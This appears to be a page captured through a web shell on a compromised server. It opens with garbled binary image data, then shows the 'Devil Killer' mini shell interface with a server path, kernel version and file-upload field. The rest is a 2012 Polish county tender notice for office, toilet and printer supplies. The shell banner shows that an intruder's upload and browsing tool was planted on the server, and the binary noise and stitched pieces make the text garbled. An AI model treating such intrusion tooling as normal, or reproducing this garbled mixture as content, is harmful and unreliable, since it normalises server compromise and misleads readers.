JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120301/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120301/49377-N-2012.html

<p class="kh_header"><b>Stalowa Wola: Sukcesywna dostawa materiałów biurowych i papierniczych, toaletowych oraz oryginalnych materiałów eksploatacyjnych do kserokopiarek i oryginalnych ( równoważnych ) materiałów eksploatacyjnych do drukarek będących na wyposażeniu Starostwa Powiatowego w Stalowej Woli. I Część: materiałów biurowych i papierniczych, II część: materiałów toaletowych III część: oryginalnych materiałów eksploatacyjnych do kserokopiarek i oryginalnych (równoważnych) materiałów eksploatacyjnych do drukarek, IV część : materiałów papierniczych do ploterów, V Część: oryginalnych materiałów eksploatacyjnych do ploterów.</b><br>
<b>Numer ogłoszenia: 49377 - 2012; data zamieszczenia: 01.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Stalowowolski , ul. Podleśna 15, 37-450 Stalowa Wola, woj. podkarpackie, tel. 015 643 37 09, faks 015 643 36 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stalowowolski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa materiałów biurowych i papierniczych, toaletowych oraz oryginalnych materiałów eksploatacyjnych do kserokopiarek i oryginalnych ( równoważnych ) materiałów eksploatacyjnych do drukarek będących na wyposażeniu Starostwa Powiatowego w Stalowej Woli. I Część: materiałów biurowych i papierniczych, II część: materiałów toaletowych III część: oryginalnych materiałów eksploatacyjnych do kserokopiarek i oryginalnych (równoważnych) materiałów eksploatacyjnych do drukarek, IV część : materiałów papierniczych do ploterów, V Część: oryginalnych materiałów eksploatacyjnych do ploterów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa materiałów biurowych i papierniczych, toaletowych oraz oryginalnych materiałów eksploatacyjnych do kserokopiarek i oryginalnych ( równoważnych)  materiałów  eksploatacyjnych do drukarek będących na wyposażeniu  Starostwa Powiatowego w Stalowej Woli przy  ul. Podleśnej 15 , zgodnie z  zestawieniem  -  Załączniki A, B, C, D, E. 

I Część  - materiały papiernicze i  biurowe - Załącznik A   
 L.p.	Nazwa asortymentu	Jedn. miary	Ilość 

1  brudnopis A-4 blok z makulatury w kratkę, kartki wyrywane, 100 kart.1 szt.	30
2  brudnopis A-5 blok z makulatury w kratkę, kartki wyrywane, 100 kart.1 szt.	10
3 długopis przyklejany ze sprężynką stojący, na biurko 1 szt. 50
4 cienkopis , końcówka oprawiona w metal gr. 0,4 mm nie gorsz niż np.STAEDTLER   szt.1 100
5  długopis zwykły 	1 szt.	100
6  długopis nie gorszy niż np. GelPen, różne kolory	1 szt.	250
7  dziurkacz biurowy ( dziurkuje  nie mniej niż 30 kartek )	1 szt.	10
8  dziurkacz biurowy ( dziurkuje  nie mniej niż 65 kartek ) 	1 szt.	5
9  datownik mały	1 szt.	5
10	druk- wniosek o urlop - wg zał. wzoru	1 bloczek	20
11	druk delegacji - wg. zał. wzoru	1 bloczek 	10
12	Dziennik Korespondencyjny A-4,  96 kart. - twarda okładka 1 szt.  4
13	ekierka duża	1 szt. 	5
14	flamastry 4 kolory	1 op.	5
15	flamaster różne kolory 	1 szt. 50
16	folia do laminowania for. A5,  100 szt. ( 2 x 100 mic.)	1 opak.	5
17	folia do laminowania for. A4,  100 szt. ( 2 x 100 mic.)	1 opak.	5
18	gumka recepturka ( op. 0,5 kg)	1 opak.	2
19	gumka kreślarska do ścierania na  papierze średnia  nie gorsza niż gumka  Pentel  ZEH  1 szt.	40
20	grzbiety wsuwane A4  zaokrąglone rogi  60 k  czarne	1 szt.	50
21	grzbiety wsuwane A4  zaokrąglone rogi  30 k  czarne 	1 szt.	30
22	grzbiety do bindowania śr. 22 mm	1 szt.	50
23	kalka do faxu Panasonic KX-FP 148	1 szt.	2
24	klip binder 25 mm ( opak. 12 szt.)	1 opak.	5
25	klip binder 32 mm ( opak 12 szt.)	1 opak.	2
26	klip binder  41 mm ( opak. 12 szt. )	1 opak.	2
27	klip binder 51 mm ( opak.12 szt.  )	1 opak.	2
28	karteczki samoprzylepne, 76x 76 mm 100 szt. w bloczku	1 bloczek	400
29	karteczki białe 400 szt. bez kleju, w bloczku	1 bloczek	2
30	koperty szare  aktowe format C4  229 x 324 z paskiem samoprzylepnym	1 szt.	2000
31	j. w. półaktowe - format C5 162 x 229 z paskiem samoprzylepnym, białe	1 szt.	10000
32	koperty białe samoprzylepne format - C6 114 x 162   - 1000 szt. w opakowaniu 	1 opak.	40
33	koperta biała,  format - B4 250 x 353 z paskiem samoprzylepnym	1 szt.	250
34	koperta B4 z rozszerzonym bokiem i spodem 250x353x38 mm 	1 szt.	250
35	koperta bąbelkowa o wym.    162 x 229 mm	1 szt.	10
36	koperta bąbelkowa  na płyty CD kwadratowa 	1 szt.	100
37	koperta DL SK 110x 220 mm	1 szt.	2000
38	koszulki na akta  form.A4,  (100 szt. w opak.)   nie gorsze niż  Esselte wykonane z grubszej folii , nie mniej niż  55 mic 	1 opak.	110
39	kalka techniczna A3, gramatura 90.95 g.m2	1 szt.	100
40	klej do papieru, fotografii, mocno klejący nie marszczący papieru, nie gorszy niż np. PRITT, sztyft -20 g	1 szt.	110
41	klej biurowy  21 g	1 szt.	100
42	korektor - metalowa końcówka  nie gorszy niż np.Pentel	1 szt.	60
43	korektor w taśmie- szer. 4,2 mm dł. 6 m nie gorszy niż np. DELI	1 szt.	30
44	kredki ołówkowe 12 kolorów 	1 opak.	1
45	marker  czarny niezmywalny, wodoodporny z końcówką okrągłą gr. linii pisania 2-4 mm nie gorszy niż  np.BIC	1 szt.	50
46	marker z tłoczkiem,  różne kolory	1 szt.	10
47	magnesy do tablicy (opakowanie 12 szt. ) 	1 opak.	3
48	nożyk introligatorski nie gorszy niż Bantex	1 szt. 	5
49	nożyczki z ostrzem z nierdzewnej stali, rękojeść z niełamliwego plastiku, wys. 21 cm nie gorsze niż np. DONAU	1 szt.	20
50	linijka plastikowa dł. 30 cm przezroczysta	1 szt.	10
51	okładka do bindowania A4 - przód- bezbarwna, przezroczysta  	1 szt.	200
52	okładka do bindowania A4 - tył- niebieski, skóropodobna	1 szt.	200
53	ołówek drewniany bez gumki HB nie gorsze niż  STAEDTLER	1 szt.	100
54	ołówek automatyczny na rysiki gr. 0,7mm 	1 szt.	30
55	ofertówki sztywne A4 przeźroczyste (25 szt.)	1 opak.	10
56	okładka na dyplom A4 - różne kolory	1 szt	10
57	papier ozdobny o gramaturze 160g.m2 ( opakowanie 25 szt.)  nie gorszy niż Marble Cover   	1 opak.	5
58	papier do wszelkich urządzeń biurowych,500 szt. w ryzie, gramatura co najm. 80g.m2, format A4, białość co najm. C 146	1 ryza	1400
59	j.w lecz format A-3	1 ryza	100
60	papier do wszelkich urządzeń biurowych,500 szt. w ryzie, gramatura co najm. 80g.m2, format A4,  kolor	1 ryza	2
61	papier ozdobny nie gorszy  niż (Galeria) ( 50a) , gramatura 100g.m2, format A4 ( opakowanie 50 szt.)	1 opak.	5
62	papier ozdobny nie gorszy  niż (Galeria) ( 25a) , gramatura 250g.m2, format A4 ( opakowanie 25 szt.)	1 opak.	5
63	papier  do faxu  216 mm x 30m nie gorszy niż EMERSON	1 rolka	40
64	papier - barwne arkusze  - A4  gram. 100g.m2 ( op. 50 szt.) nie gorszy niż np. Italia L	1 opak	5
65	papier- barwne arkusze - A4  gram. 170g.m2 ( op. 25 szt.) nie gorszy niż np. Arnika	1 opak	5
66	papier komputerowy  ( 1 oryg.+2 kopie z napisem (oryginał.kopia) - szer. 240 wys. 305mm nie gorszy niż EMERSON	1 szt.	10
67	papier wizytówkowy  biały A4 o gram co najmniej 230g.m2	1 op.	10
68	papier biurowy, 250 szt. w opakowaniu, gramatura co najm. 230g.m2, format A4,  biały, gładki  	1 ryza	5
69	papier biurowy, 250 szt. w opakowaniu gramatura co najm. 200gr.m2, format A3, biały	1 ryza	1
70	kołeczki plastikowe kolorowe do tablic korkowych ( op. 50 szt. ) 	1 opak.	2
71	płyta CD-R  Slim	1 szt.	200
72	płyta DVD-R Slim	1 szt.	50
73	płyta CD-R z możliwością nadruku	1 szt.	50
74	płyta DVD-R z możliwością nadruku	1 szt. 	50
75	płyta DVD+RW Slim	1 szt.	50
76	poduszka do tuszu czerwona o wym. około 50 x90 mm nie gorsze niż np. Trodat	1 szt.	10
77	poduszka do tuszu czerwona o wym. około 160x90mm nie gorsze niż np. Trodat	1 szt.	5
78	pojemnik na spinacze z magnesem z wytrzymałego tworzywa sztucznego o poj. do 30 szt. nie gorszy niz . EAGLE	1 szt.	2
79	półka  plastikowa na dokumenty , przeźroczysta   	1 szt.	30
80	pianka ( płyn) do czyszczenia obudowy sprzętu komputerowego o poj. 400 ml	1 szt.	5
81	płyn do  czyszczenia ekranów monitorów LCD poj. 100 ml	1 szt.	5
82	pudła archiwizacyjne A4 z tektury bezkwasowej do przechowywania dokumentów w pozycji pionowej szer. 50 mm, gramatura nie mniej niż 1000g.m2 	1 szt.	150
83	pudła archiwizacyjne A4 z tektury bezkwasowej do przechowywania dokumentów w pozycji pionowej szer. 100 mm gramatura nie mniej niż 1000g.m2 	1 szt.	150
84	rozszywacz do zszywek 24.6 metalowy, w obudowie plastikowej 	1 szt.	12
85	rysiki do ołówków automatycznych B  gr. 0,7 	1 opak.	10
86	rysiki do ołówków automatycznych B  gr. 0,5 	1 opak.	10
87	segregator A4, gr. 7 cm,  na dolnych krawędziach metalowe okucia, zew. okładka z PP, wyklejony wew. jasnym papierem, okładka zew. kolorowa, wymienialna etykietka na grzbiecie	1 szt.	500
88	j.w. segregator  A4  gr. 5 cm	1 szt.	100
89	skoroszyt karton  pełny, 250g.m2,  A4	1 szt.	50
90	skoroszyt karton oczkowy pełny  250g.m2,  A4	1 szt.	600
91	skoroszyt karton ? oczkowy 250g.m2 A4	1 szt.	100
92	skoroszyt plastikowy, oczkowy  A4  z twardego  i sztywnego PCV, tył kolorowy	1 szt.	600
93	spinacze biurowe małe,  28 mm - opak. 100 szt.	1 opak.	150
94	spinacze biurowe duże , 50 mm - opak. 100 szt. 	1 opak.	80
95	strugaczka do ołówków obudowa z tworzywa sztucznego poj. ostrze, obudowa okrągła 	1 szt.	20
96	sznurek szpagat jutowy 50 dkg	1 szt.	40
97	tusz do pieczątek - czerwony 25 ml nie gorsz niż  np. Shiny	1 szt.	25
98	j.w. lecz  czarny 25 ml nie gorsz niż np. Shiny	1 szt.	10
99	taśma klejąca bezbarwna 18 mm x20 m 	1 szt.	80
100	taśma pakowa 48 mm x50 akrylowa brązowa 	1 szt.	10
101	taśma matowa na podajniku nie gorsza niż Scotch	1 szt.	5
102	taśma do maszyny do pisania czarna 13 mm	1 szt.	2
103	teczka wiązana A4, karton 250g.m2	 1 szt.	3000
104	teczka wiązana A4, plastikowa (PCV)	1 szt.	50
105	teczka skrzydłowa na rzepy	1 szt.	5
106	teczka harmonijkowa ( do podpisu) 20 kart.	1 szt.	10
107	wkład do zwykłego długopisu dł. 14 cm , gruba końcówka	1 szt.	50
108	wkład wymienny  do Rapidografu gr. 0,25 nie gorszy niż Rystor 	1 szt.	2
109	wkład do długopisu wykazanego w poz. 6, różne kolory	1 szt.	300
110	zakładki indeksujące standardowe o wym. 20 x50 mm  	1 op.	5
111	zszywki  24.6 - opak. 1000 szt.   - do 20 kart.	1 opak.	170
112	zszywki do ciężkiego zszywacza, 23.8 -opak 1000 szt.- do 100 kartek	1 opak.	10
113	zeszyt A5  kratka  32 kartkowy	1 szt.	5
114	zeszyt A4  kratka  96 kartkowy , twarda okładka 	1 szt.	30
115	zeszyt A5  kratka  96 kartkowy, twarda okładka 	1 szt.	20
116	zeszyt A5  kratka  16 kartkowy	1 szt.	5
117	zszywacz biurowy ( zszywa  min 50 kartek ) o dł. ramienia około 12 cm nie gorszy niż  SAX	1 szt.	15
118	zszywacz biurowy ( zszywa   200  kartek ) 	1 szt.	2
119	zakreślacz fluorescencyjny, z wyprofilowaną  ściętą końcówka gr. 2-5 mm 	1 szt.	100

II Część  -  materiały toaletowe   -    Załącznik  B

L.p.	Nazwa asortymentu	Jedn. miary	Ilość 

1	papier toaletowy biały, dwuwarstwowy o średnicy max 18 cm wysokości 9cm do podajników zamykanych typu TORK, EKA 	1 rolka	1200
2	papier toaletowy zwykły do zawieszania 	1 rolka	800
3	ręczniki papierowe białe, dwuwarstwowe o śr. max 14cm, wysokości 19cm MINI do podajników zamykanych typu TORK, EKA	1 rolka	 1000
4	ręczniki papierowe białe, dwuwarstwowe o śr. max 18cm, wysokości 19cm JAMBO do podajników zamykanych TORK, EKA 	1 szt.	600
5	ręcznik kuchenny  ( 2 szt. w zgrzewce )	1 zgrzewka	60
6	płyn do mycia naczyń 5 l nie gorszy niż Ludwik 	1pojemnik	10
7	mydło w płynie antybakteryjne opak 5 l	1pojemnik	25
8	mydło toaletowe w kostce 100g	1 szt.	40
9	kostka zapachowa WC nie gorsza niż np. Domestos	1 szt.	30
10	płyn do czyszczenia nie gorszy niż AJAX opak 1 litr	1 szt.	3

III Część  -  oryginalne materiały eksploatacyjne do kserokopiarek i oryginalne 
( równoważne ) materiały eksploatacyjne do drukarek  - Załącznik C

L.p.	Nazwa asortymentu	Jedn. miary	Ilość 	O-oryginalne
                                                                R- równoważne

 	Tonery do kserokopiarek	 	 	 
1	MITA DC-2360	1 szt.	1	O
2	KYOCERA KM-2035	1 szt.	5	O
3	RICOH MPW 2400 czarny	1 szt.	3	O
4	RICOH MP C 2800 K czarny	1 szt.	10	O
5	RICOH MP C 2800 Y.C.M	1 szt.	15	O
6	RICOH MF 171	1 szt.	5	O
7	RICOH Aficio 2027	1 szt.	6	O
8	RICOH Aficio 3035	1 szt.	4	O
9	RICOH Aficio C2051 czarny	1 szt.	2	O
10	RICOH Aficio C2051 Y.C.M	1 szt.	3	O
11	RICOH FT 4015	1 szt.	2	O
12	RICOH FT 4822	1 szt.	4	O
13	RICOH FW 870	1 szt.	2	O
14	taśma barwiąca  EPSON  LQ300  do drukarki igłowej	1 szt.	3	R lub O 
15	taśma do OKI M 390 FB do drukarki igłowej	1 szt.	3	R lub O
 	Tonery do drukarek laserowych	 	 	
16	HP Laser Jet 1100	1 szt.	2	R lub O
17	HP Laser Jet 1200.1000	1 szt.	6	R lub O
18	HP Laser Jet  1150	1 szt.	3	R lub O
19	HP Laser Jet   P2014 	1 szt.	2	R lub O
20	HP Laser Jet 1300	1 szt.	5	R lub O
21	HP Laser Jet 1010.1018.1020	1 szt.	65	R lub O
22	HP Laser Jet 4250n, 19 000 stron	1 szt.	1	R lub O
23	HP Laser Jet P1005.1006	1 szt.	20	R lub O
24	HP Laser Jet P1505n	1 szt.	4	R lub O
25	HP Laser Jet P1102	1 szt.	10	R lub O
26	HP Laser Jet M2727nf MFP	1 szt.	3	R lub O
27	Lexmark Optra E.321.323	1 szt.	5	R lub O
28	Lexmark T420 	1 szt.	5	R lub O
29	Lexmark E120 	1 szt.	25	R lub O
30	Lexmark E 260dn	1 szt.	2	R lub O
31	Lexmark E 360dn . duży 9000 stron	1 szt.	4	R lub O
32	OKI B6100N	1 szt.	2	R lub O
33	OKI C3300.C3450 czarny, 2500 stron	1 szt.	10	R lub O
34	OKI C3300.C3450 C.M.Y, 2500 stron	1 szt.	15	R lub O
35	OKI 5650n czarny 	1 szt.	1	R lub O
36	OKI 5650n kolor	1 szt.	1	R lub O
37	OKI B430d 7000 stron	1 szt.	5	R lub O
38	OKI B431d 10000 stron	1 szt.	10	O
39	Samsung ML 3561 ND, 12000 stron	1 szt.	5	R lub O 
 	Tusze do drukarek atramentowych	 	 	 
40	HP DJ  845C.840 czarny	1 szt.	2	R lub O
41	HP DJ  845C.840 kolor	1 szt.	1	R lub O
42	HP DJ 9800 kolor, 450 stron	1 szt.	6	R lub O
43	HP DJ 9800 czarny, 800 stron	1 szt.	6	R lub O
44	HP Office Jet K7100 czarny, 	1 szt.	6	R lub O
45	HP Office Jet K7100 kolor 	1 szt.	4	R lub O
46	CANON PIXMA IP4500 mały CLI- BK  czarny	1 szt.	4	R lub O
47	CANON PIXMA IP4500 duży PGI-  BK czarny	1 szt.	25	R lub O
48	CANON PIXMA IP4500  kolor   C.M.Y	1 szt.	15	R lub O
49	CANON PIXMA IP 90 czarny	1 szt.	6	O
50	CANON PIXMA IP 90 kolorowy	1 szt.	5	O
 	Bębny do drukarek	 	 	 
51	bęben do LEXMARK  E 120  	1 szt.	3	O
52	bęben do OKI 3300.3450 czarny 	1 szt.	5	O
53	bęben do OKI 3300.3450 kolor 	1 szt.	5	O
54	bęben OKI B431d 	1 szt.	10	O
55	bęben OKI B430d 	1 szt.	10	O
56	bęben do Lexmark E 260	1 szt.	1	O
57	bęben do Lexmark E 360 dn 	1 szt.	1	O

 IV Część  -  materiały papiernicze  do  ploterów  -  Załącznik D

L.p.	Nazwa asortymentu	Jedn. miary	Ilość 

1	papier do plotera Ricoh-PPC, wysoka biel, bezpyłowy 80grs.m2 0,914 x 175 m	1 opak.	12
2	papier do plotera Ricoh-PPC,  wysoka biel, bezpyłowy 80grs.m2 0,841 x 175 m	1 opak.	12
3	papier do plotera Ricoh-PPC , wysoka biel, bezpyłowy 80grs.m2 0,594 x 175 m	1 opak.	12
4	papier do plotera Ricoh-PPC , wysoka biel, bezpyłowy 80grs.m2 0,420 x 175 m	1 opak.	12
5	papier do plotera Ricoh-PPC , wysoka biel, bezpyłowy 80grs.m2 0,297 x 175 m	1 opak.	12
6	papier do plotera OCE AO, wysoka biel, bezpyłowy 90grs.m2 0,841 x 120 m Nr art.97024719	1 opak.	12
7	papier do plotera OCE AO wysoka biel, bezpyłowy 90grs.m2 0,594 x 120 m Nr art. 97024717	1 opak.	12
8	papier do plotera HP-DIAJET, wysoka biel, bezpyłowy 90grs.m2 0,610 x 50 m	1 opak.	6
9	papier do plotera HP-DIAJET, wysoka biel, bezpyłowy 90grs.m2 0,420 x 50 m	1 opak.	6
10	papier do plotera HP-DIAJET, wysoka biel, bezpyłowy 90grs.m2 0,297 x 50 m	1opak.	6

V Część  -  materiały papiernicze  do  ploterów  -  Załącznik E

L.p.	Nazwa asortymentu	Jedn. miary	Ilość 	 O-oryginalne
 

1	tusz do plotera Oce CS 2236,  IJC236 Ink Tank Pigment Black ( nr katalogowy 29952264 ) 130 ml	1 szt.	8	O
2	tusz do plotera Oce CS 2236,  IJC236 Ink Tank Dye Black ( nr katalogowy 29952265 ) 130 ml	1 szt.	4	O
3	tusz do plotera Oce CS 2236,  IJC236 Ink Tank Dye Cyan ( nr katalogowy 29952266 )  130 ml	1 szt.	4	O
4	tusz do plotera Oce CS 2236, IJC236 Ink Tank Dye Magenta ( nr katalogowy 29952267 )  130 ml	1 szt.	4	O
5	tusz do plotera Oce CS 2236 IJC236 Ink Tank Dye  Yellow ( nr katalogowy 29952268 ) , 130 ml	1 szt.	4	O
6	tusz do plotera HP 450 C czarny	1 szt.	3	O
7	tusz do plotera HP 450 C kolor ( cyan, magenta,yellow)	1 szt.	9	O


 oznaczenia :    O  - materiały oryginalne ,  R  - materiały równoważne -100 % NOWE 

1.	Dostarczany przedmiot zamówienia musi być nowy, fabrycznie opakowany, wolny od wad technicznych, jakościowo dobry oraz spełniać wymagania obowiązujących  norm i  przepisów. 

2.	Przedstawione w wykazach ilości zamówienia są wielkościami, które w trakcie trwania umowy mogą ulec zmianie. Wykazane ilości mają charakter orientacyjny przyjęty dla celu porównania ofert i wyboru najkorzystniejszej oferty. Zamawiający nie gwarantuje ich całkowitej realizacji. Wykonawcy z którym Zamawiający podpisze umowę nie przysługuje roszczenie o realizację dostawy w wielkościach podanych w Załącznikach A,B,C,D,E,

3.	Zamawiający w kolejnych składanych zamówieniach będzie szczegółowo określał ilości zamawianego asortymentu. Realizacja przedmiotu zamówienia będzie następować każdorazowo na podstawie złożonego faxem zamówienia określającego ilość i asortyment dostawy zgodnie z w.w zestawieniem. 

4.	Zamówiona faxem dostawa musi być zrealizowana w ciągu 2 dni roboczych ( za dni robocze uznaje się dni od poniedziałku do piątku ) od momentu zgłoszenia zamówienia przez Zamawiającego, a w przypadkach wymagających natychmiastowej dostawy w ciągu 24 godz. od momentu zgłoszenia. Jeżeli termin realizacji dostawy przypada na dzień wolny od pracy dla Zamawiającego, termin ten upływa w następnym dniu roboczym Zamawiającego.   

5.	Zamawiający dopuszcza składanie ofert równoważnych.  

W przypadku gdy Zamawiający dokonał opisu przedmiotu zamówienia w Załącznikach  A,B,C,D,E przez wskazanie przykładowych nazw, znaków towarowych lub pochodzenia, dopuszcza się zastosowanie rozwiązań równoważnych opisywanym. Wszystkie wskazane z nazwy materiały należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych. 
Oferowane przez Wykonawcę materiały równoważne muszą być w ofercie wymienione z nazwy. Ciężar udowodnienia, że materiały równoważne posiadają parametry wymagane przez Zamawiającego leży po  stronie Wykonawcy.

6.	Zamawiający dopuszcza możliwość dostarczenia materiałów eksploatacyjnych do drukarek, równoważnych wykonanych w 100% z nowych materiałów, do oryginalnych ( oznaczone literką R kol. 5, Części III  )	

7.	Zamawiający wymaga aby materiały eksploatacyjne do kserokopiarek i drukarek (oznaczone literką O kol. 5 Załącznika C dotyczącego III Części ) oraz ploterów (oznaczone literką O kol. 5 Załącznika E dotyczącego V Części ) dostarczone były jako  oryginalne. 
Przez materiały równoważne dostarczane do drukarek Zamawiający rozumie produkt wykonany w 100% z nowych materiałów, kompatybilny ze sprzętem, do którego jest zamówiony, o parametrach takich samych bądź lepszych ( pojemność tuszu/tonera, wydajność i jakość wydruku ) w stosunku do oryginału produkowanego przez producenta urządzenia. 

8.Na materiały eksploatacyjne dostarczone jako równoważne Wykonawcy udzielą dożywotnej gwarancji niezawodnego działania przez cały okres eksploatacji, niezależnie od długości  jej trwania. Wykonawcy przyjmą na siebie koszty związane z awarią urządzenia drukującego, jeżeli  jej przyczyną byłoby zastosowanie materiału równoważnego. 
	
9.Jeżeli ze względów technicznych i jakościowych materiał równoważy nie będzie mógł być eksploatowany w danej drukarce, Wykonawca zobowiązany jest dostarczyć nowy oryginalny materiał po cenie równoważnego. Wymiana produktu nastąpi w ciągu 24 godz. od momentu zgłoszenia przez Zamawiającego o wadliwym produkcie. 

10.Dostarczane materiały eksploatacyjne muszą posiadać na opakowaniach zewnętrznych nazwę producenta, nazwę ( typ, symbol ) materiału, opis zawartości. 

11.Wykonawca zobowiązany jest dostarczyć przedmiot zamówienia własnym środkiem transportu do Starostwa Powiatowego w Stalowej Woli przy ul.  Podleśnej 15.

12.Na dostarczone materiały biurowe, papiernicze, i oryginalne materiały eksploatacyjne Wykonawca udziela 12 miesięcznej gwarancji liczonej od dnia dostawy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających , stanowiących nie więcej niż 10 % wartości zamówienia podstawowego, polegających na rozszerzeniu dostawy.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-4, 33.76.10.00-2, 33.76.30.00-6, 33.71.19.00-6, 39.83.20.00-3, 30.12.51.00-2, 30.12.51.10-5, 30.12.51.20-8, 30.19.76.44-2.</p>
